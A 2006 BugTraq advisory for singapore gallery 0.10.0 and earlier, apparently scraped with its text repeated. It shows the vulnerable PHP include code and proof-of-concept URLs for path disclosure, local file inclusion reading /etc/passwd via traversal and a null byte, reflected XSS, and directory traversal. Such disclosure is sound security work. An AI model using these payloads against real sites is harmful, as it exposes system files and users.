BugTraq
Back to list
|
Post reply
singapore gallery <= 0.10.0 Multiple Vulnerabilities
Jun 18 2006 08:31AM
simo64 gmail com
Produce : singapore gallery
Versions : 0.10.0 and prior
Site : http://www.sgal.org/
Discovred By : Moroccan Security Research Team (Simo64)
Greetz : CiM-Team - dabdoub - DarkbiteX - drackanz - Iss4m - Mourad - Rachid
.:r00tkita - s4mi - Silitix - tahati - And All Friends :)
[-] Vulnerable code near lignes 16-35
<?
16 . require_once "includes/singapore.class.php";
19 . $sg = new Singapore();
35 . include $sg->config->base_path.$sg->config->pathto_current_template."index.tpl.p
hp";
?>
[+] Full Path Disclosure :
**************************
Exemple:
http://localhost/singapore/index.php?template=simo64
Result :
Warning: main(templates/simo64/index.tpl.php): failed to open stream: No such file or directory in /home/sing/public_html/livedemo/index.php on line 35
[+] Local File Inclusion :
***************************
Proof Of Concept :
http://localhost/singapore/index.php?template=./../../../../etc/passwd%0
0
[+] Cross Site Scripting :
**************************
http://localhost/singapore/index.php?template=<script>alert('Moroccan Security Team');</script>
[+] Directory Traversal :
**************************
Proof Of Concept :
http://localhost/singapore/index.php?gallery=./../../../
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
Versions : 0.10.0 and prior
Site : http://www.sgal.org/
Discovred By : Moroccan Security Research Team (Simo64)
Greetz : CiM-Team - dabdoub - DarkbiteX - drackanz - Iss4m - Mourad - Rachid
.:r00tkita - s4mi - Silitix - tahati - And All Friends :)
[-] Vulnerable code near lignes 16-35
<?
16 . require_once "includes/singapore.class.php";
19 . $sg = new Singapore();
35 . include $sg->config->base_path.$sg->config->pathto_current_template."index.tpl.p
hp";
?>
[+] Full Path Disclosure :
**************************
Exemple:
http://localhost/singapore/index.php?template=simo64
Result :
Warning: main(templates/simo64/index.tpl.php): failed to open stream: No such file or directory in /home/sing/public_html/livedemo/index.php on line 35
[+] Local File Inclusion :
***************************
Proof Of Concept :
http://localhost/singapore/index.php?template=./../../../../etc/passwd%0
0
[+] Cross Site Scripting :
**************************
http://localhost/singapore/index.php?template=<script>alert('Moroccan Security Team');</script>
[+] Directory Traversal :
**************************
Proof Of Concept :
http://localhost/singapore/index.php?gallery=./../../../
[ reply ]